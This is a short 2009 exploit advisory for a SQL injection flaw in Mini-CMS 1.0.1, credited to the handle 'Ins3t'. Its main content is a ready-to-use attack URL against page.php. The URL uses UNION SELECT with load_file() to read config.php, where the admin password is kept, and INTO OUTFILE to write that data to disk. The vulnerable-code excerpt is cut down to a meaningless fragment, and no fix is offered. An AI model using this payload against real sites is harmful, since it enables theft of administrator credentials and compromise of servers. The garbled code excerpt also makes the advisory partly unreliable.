[+]--------------------------------------------------------------------------------------------------------------------[+] [+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+] [+]--------------------------------------------------------------------------------------------------------------------[+] -[INFO]----------------------------------------------------------------------------------------------------------------[+] [+] Title:Mini-CMS 1.0.1 SQL inlection [+] Autor: Ins3t [+] Site: www.arthacking.net [+] Date:08.08.2009 [+]--------------------------------------------------------------------------------------------------------------------[+] -[BUG INFO]------------------------------------------------------------------------------------------------------------[+] [+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the database, and in the config.php file. [+] Conditions: magic_quotes_gpc = Off | full patch of file config.php [+] Code vulnerable functions: [+]-------------------------------------------------[CODE]--------------------------------------------------------------[+] text; print("$content"); } ?> [+]------------------------------------------------[/CODE]--------------------------------------------------------------[+] [+] Exploit: [+]-------------------------------------------------[CODE]--------------------------------------------------------------[+] http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+ [+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]